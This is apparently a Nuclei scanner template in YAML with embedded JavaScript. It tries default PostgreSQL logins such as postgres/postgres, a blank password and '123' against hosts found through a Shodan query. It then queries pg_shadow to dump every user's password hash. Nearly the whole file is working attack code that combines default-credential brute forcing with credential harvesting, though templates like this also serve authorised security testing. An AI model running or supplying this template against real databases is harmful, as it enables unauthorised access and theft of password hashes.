id: pgsql-list-password-hashes

info:
  name: PostgreSQL List Password Hashes
  author: pussycat0x
  severity: high
  description: |
    Dump password hashes in use within a PostgreSQL database.
  reference:
    - https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/PostgreSQL%20Injection.md#postgresql-list-password-hashes
    - https://launchbylunch.com/posts/2024/Jan/16/postgres-password-encryption/#postgresql-password-encryption-scram-sha-256
    - https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/auxiliary/scanner/postgres/postgres_hashdump.md
  metadata:
    shodan-query: product:"PostgreSQL"
    verified: true
  tags: js,network,postgresql,authenticated

javascript:
  - code: |
      const postgres = require('nuclei/postgres');
      const client = new postgres.PGClient;
      connected =  client.ExecuteQuery(Host, Port, User, Pass, Db, "SELECT usename, passwd FROM pg_shadow");
      Export(connected)

    args:
      Host: "{{Host}}"
      Port: 5432
      User: "{{usernames}}"
      Pass: "{{password}}"
      Db: "{{database}}"

    payloads:
      usernames:
        - postgres
        - admin
      password:
        - postgres
        -
        - 123
        - amber
      database:
        - postgres

    attack: clusterbomb

    extractors:
      - type: json
        json:
          - '.Rows[] | "\(.usename) : \(.passwd)"'
# digest: 4a0a00473045022047f8c59418ff656633d5eba4f98e74b52d0538cd2eda752860280ca7054d81720221008698479a459fb808ae833d9bed8faed411488105ae01bea84f1095e768f7c5bd:922c64590222798bb761d5b6d8e72950